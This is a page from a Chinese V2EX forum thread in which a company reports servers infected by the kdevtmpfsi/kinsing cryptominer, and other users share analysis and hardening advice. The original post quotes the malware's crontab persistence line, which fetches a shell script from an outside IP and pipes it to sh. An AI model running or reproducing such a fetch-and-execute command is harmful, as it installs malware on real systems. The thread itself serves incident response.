公司服务器被攻击了！

2021-11-01 12:42:43 +08:00

leiuu

周六公司服务器被大面积攻击，植入挖矿程序，cpu 被打爆。

怀疑是通过某个开源框架的远程执行漏洞进来的，但不知道是从具体哪个机器进入。

该病毒基本特征：

会增加一个 crontab 任务到一个或多个用户。远程下载挖矿脚本到 tmp 目录。

* * * * * wget -q -O - http://185.191.32.198/spr.sh |sh > /dev/null 2>&1

启动多个「 kdevtmpfsi 」进程，之后机器 cpu 资源被几乎耗尽。

涉及的服务器很多，v 友们有什么好的分析思路分享吗？

8919 次点击

所在节点

信息安全

53 条回复

0x73346b757234

2021-11-01 16:39:20 +08:00

@leiuu 噢，是通过一些信息检索找到的。
做安全的可能这块相对熟悉一些，也只是个普通的安全从业者😂，建议你们部署一些主机安全设备加强防护。

podel

2021-11-01 18:00:41 +08:00

salt 也有可能。

chiuan

2021-11-01 18:03:22 +08:00

为什么不用云服务器。

Leao9203

2021-11-01 18:12:36 +08:00

@sudoy 部署到云服务器估计更难修...毕竟 CPU 被打爆，有时候连都连不上的

Rwing

2021-11-01 18:31:19 +08:00

抓紧破案，有结果了辛苦 at 我一下哈

cc9781

2021-11-01 18:44:39 +08:00

https://s.tencent.com/research/report/1254.html

cc9781

2021-11-01 18:45:24 +08:00

@zhshj98282123 参考下, 如果主机有 web 服务的话, 看下 access 日志

leiuu

2021-11-01 19:25:38 +08:00

@chiuan 中招的里边有阿里云和腾讯云服务器。估计我们用的不规范吧。还在找原因。

leiuu

2021-11-01 19:28:58 +08:00

@sssbbb 怀疑是 jumperserver key 泄露了。但无证据。。。

leiuu

2021-11-01 20:04:01 +08:00

@046569 日志服务器的点子不错。后续有意搭建一个。thx 。

hefish

2021-11-01 20:32:16 +08:00

居然有用 root 跑的服务。。。

lamesbond

2021-11-01 21:52:22 +08:00

半年前也中了挖矿病毒，java 服务有漏洞，项目里的 shiro 和 databind 的版本太低了，后来更新版本后就好了。建议上 waf ，waf 会直接告诉你哪里有漏洞。
看看访问日志里有没有不正常的访问记录，我当时把 ip 一搜显示被举报的 ip

tiedan

2021-11-01 21:59:08 +08:00

hadoop?

SuperShuYe

2021-11-01 22:43:49 +08:00

@melsp 我们最近也是 lockbit

icepie

2021-11-01 23:18:17 +08:00

经历过一样的事情, 只因为 docker 开放了个端口出去

Borch

2021-11-01 23:21:52 +08:00

上百台服务器...服务器这么多公司都没有招安全类的工程师吗，搞个安全部门，平时渗透测试下

LudwigWS

2021-11-02 08:04:35 +08:00

如果是 Windows 能一键恢复就好了😊

Eytoyes

2021-11-02 08:41:53 +08:00

我个人思路的话：
1 、先把几个挖矿地址 ban 掉或者视情况把防火墙设置为国内访问，然后解除高占用进程，恢复服务；
2 、搭个测试环境，运行挖矿脚本，还原入侵过程
3 、根据入侵过程把对应的漏洞补上，根据脚本内容清理对应挖矿产生的文件

本人半路出家的，不知道正规处理是怎么个方式？

0x73346b757234

2021-11-02 10:01:50 +08:00

更新：

重新尝试分析了一下 kinsing ，发现与 H2Miner 黑产的样本高度相似。
腾讯安全同事去年分析过 H2Miner： https://s.tencent.com/research/report/976.html
你们这个应该跟这个基本上差不多，只是样本多了些别的功能，比如多了对 F5 RCE 漏洞的支持。

408ss

2021-11-02 10:03:17 +08:00

你们公司需要一些安全防护产品

第 2 页／共 3 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/812098

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.